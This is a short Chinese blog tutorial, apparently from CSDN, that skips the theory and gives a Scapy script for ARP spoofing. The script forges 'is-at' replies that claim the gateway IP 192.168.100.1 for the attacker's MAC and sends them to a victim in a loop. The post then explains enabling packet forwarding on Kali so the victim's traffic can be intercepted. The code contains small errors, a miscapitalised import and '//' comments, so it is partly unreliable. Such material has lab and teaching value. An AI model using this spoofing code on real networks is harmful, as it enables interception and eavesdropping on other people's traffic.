Scapy_库_ARP_Spoofing

本文不深入探讨ARP_Spoofing的原理,而是直接展示如何利用Scapy库来实施ARP_Spoofing。通过构造"is-at"类型的ARP数据包,攻击者可以欺骗网络中设备的ARP缓存,将特定IP的MAC地址指向攻击者的设备。一旦欺骗成功,攻击者可以开启数据包转发,使得网络流量经过攻击者设备,从而实现流量嗅探。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

ARP_Spoofing

  • 原理在此就不做阐述了,直接抓包上代码
    这里写图片描述

在前面的ARP_Scanner中其实有一个op字段,这字段的作用是这是ARP包的类型。”who-has”是一个广播类型的包,用于请求目标主机的MAC地址,而现在我们要用到的类型是”is-at”,用于回复“who-has”

####构造数据包:is-at

 from scapy.all import (
    Ether, 
    ARP,
    Sendp      //发包函数,只管发包
)
  eth = Ether()        //构造以太包头
  arp = ARP(  
     op = "is-at",      //设置op字段为”is-at”
     hwsrc = "00:0c:29:24:94:d1",    //设置攻击机的MAC地址
     psrc = "192.168.100.1",          //伪造身份IP
     hwdst = "54:89:98:3F:0B:C9",    //靶机的MAC地址
     pdst = "192.168.100.2"         //靶机的源地址
  ) 
 print((eth/arp).show())
 sendp((eth/arp),inter=2,loop=1)
攻击环境

KALI

  • 发起欺骗:
    这里写图片描述
    这里写图片描述

当我们查看ARP的缓存时,发现192.168.100.1的MAC地址和192.168.100.249,这就说明我们欺骗成功,这个时候我们kali上开启数据包转发的功能,那么PC2能正常访问PC1,但是数据流量都可以被kali截获到。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值